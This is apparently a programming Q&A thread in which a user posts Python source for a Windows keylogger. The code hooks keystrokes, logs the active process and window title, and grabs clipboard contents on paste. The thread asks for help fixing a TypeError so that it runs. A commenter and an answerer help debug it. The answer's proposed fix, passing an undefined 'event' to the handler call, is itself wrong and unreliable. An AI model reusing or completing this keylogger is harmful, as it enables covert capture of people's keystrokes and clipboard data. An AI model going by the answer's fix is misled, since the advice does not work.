# missing two required positional arguments for a function in python

Tags: python

been looking around and couldn't seem  to find the answer i was looking, sorry if this is a poorly phrased question

the code is

```
import ctypes
import ctypes.wintypes
from io import StringIO
from multiprocessing import Value

import os
import pythoncom
import pyWinhook as pyhook
import sys
import time
import win32clipboard

TIMEOUT = 60*10



class keyloggerz:
    def __init__(self):
        self.current_window = None

    def get_current_process(self):
        hwnd = ctypes.windll.user32.GetForegroundWindow()
        pid = ctypes.c_ulong(0)
        ctypes.windll.user32.GetWindowThreadProcessId(hwnd, ctypes.byref(pid))
        process_id = f'{pid.value}'

        executable = ctypes.create_string_buffer(512)
        h_process = ctypes.windll.kernel32.OpenProcess(0x400|0x10, False, pid)
        ctypes.windll.psapi.GetModuleBaseNameA(h_process, None, ctypes.byref(executable), 512)

        window_title = ctypes.create_string_buffer(512)
        ctypes.windll.user32.GetWindowTextA(hwnd, ctypes.byref(window_title), 512)
        try:
            self.current_window = window_title.decode()
        except UnicodeDecodeError as e:
            print(f'{e}: window name unkown')
        
        print('\n', process_id, executable.value.decode(), self.current_window)

        ctypes.windll.kernel32.CloseHandle(hwnd)
        ctypes.windll.kernel32.CloseHandle(h_process)

    def mykeystroke(self, event):
        if event.WindowName != self.current_window:
            self.get_current_process()
        if 32 < event.Ascii < 127:
            print(chr(event.Ascii), end='')
        else:
            if event.key == 'V':
                win32clipboard.OpenClipboard()
                value = win32clipboard.GetClipboardData()
                win32clipboard.CloseClipboard()
                print(f'[PASTE] - {value}')
            else:
                print(f'{event.key}')
        return True

def run():
   save_stdout = sys.stdout
   sys.stdout = StringIO()

   kl = keyloggerz
   hm = pyhook.HookManager
   hm.KeyDown = kl.mykeystroke()
   hm.HookKeyboard()
   while time.thread_time() < TIMEOUT:
       pythoncom.PumpWaitingMessages()
       log = sys.stdout.getvalue()
       sys.stdout = save_stdout
       return log
    
if __name__ == '__main__':
    print(run())
    print('done.')
```

on running it comes up with the error:
TypeError: keyloggerz.mykeystroke() missing 2 required positional arguments: 'self' and 'event'

any sort of help would be appreciated

Comment: kl = keyloggerz you are not creating a object here you are just copying the CLASS.
It should be kl = keyloggerz()

Answer (score 0):

Your problem starts with the instantiation of `keyloggerz`:

```py
kl = keyloggerz
```

It should be:

```py
kl = keyloggerz()
```

The main problem is two lines below, in:

```py
hm.KeyDown = kl.mykeystroke()
```

If you look at the definition for `keyloggerz.mykeystroke()`, you see that it takes 2 parameters:

```py
def mykeystroke(self, event):
    ...
```

So, when you call the function, you need to pass in the `event` parameter:

```py
hm.KeyDown = kl.mykeystroke(event)
```

When you call a method, the first parameter is automatically passed the class instance object, usually called `self`. Therefore, when you call it via `kl.mykeystroke(event)`, it is in reality calling `keyloggerz.mykeystroke(kl, event)`. Because you didn't instantiate the class at the beginning, your function call was basically `keyloggerz.mykeystroke()`, which was missing both the `self` and `event` parameters.